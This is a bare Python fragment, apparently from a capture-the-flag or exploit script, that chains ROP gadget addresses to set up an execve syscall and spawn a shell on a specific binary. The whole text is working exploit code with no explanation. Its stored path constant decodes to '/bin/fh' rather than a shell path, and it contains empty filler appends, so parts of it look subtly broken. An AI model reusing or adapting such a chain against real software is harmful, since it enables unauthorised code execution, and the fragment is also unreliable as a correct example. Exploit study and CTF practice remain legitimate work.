payload = p64(0x40125d)
#0x000000000040125d: pop rbp; ret; 
payload += p64(0x4ed170)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x68662f6e69622f)+p64(0x45ec8e)
# 0x000000000045ec8e: pop rax; ret; 
payload += p64(0x45ec8e)+p64(0x474cbb)
# 0x0000000000474cbb: mov qword ptr [rbp - 0x100], rdi; jmp rax; 
payload += b''
# 0x000000000045ec8e: pop rax; ret; 
payload += p64(0x3b)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x4ed070)+p64(0x45e6da)
# 0x000000000045e6da: pop rsi; ret; 
payload += p64(0x0)+p64(0x468395)
# 0x0000000000468395: pop rdx; ret 0; 
payload += p64(0x0)+p64(0x4061c4)
# 0x00000000004061c4: syscall; 
payload += b''
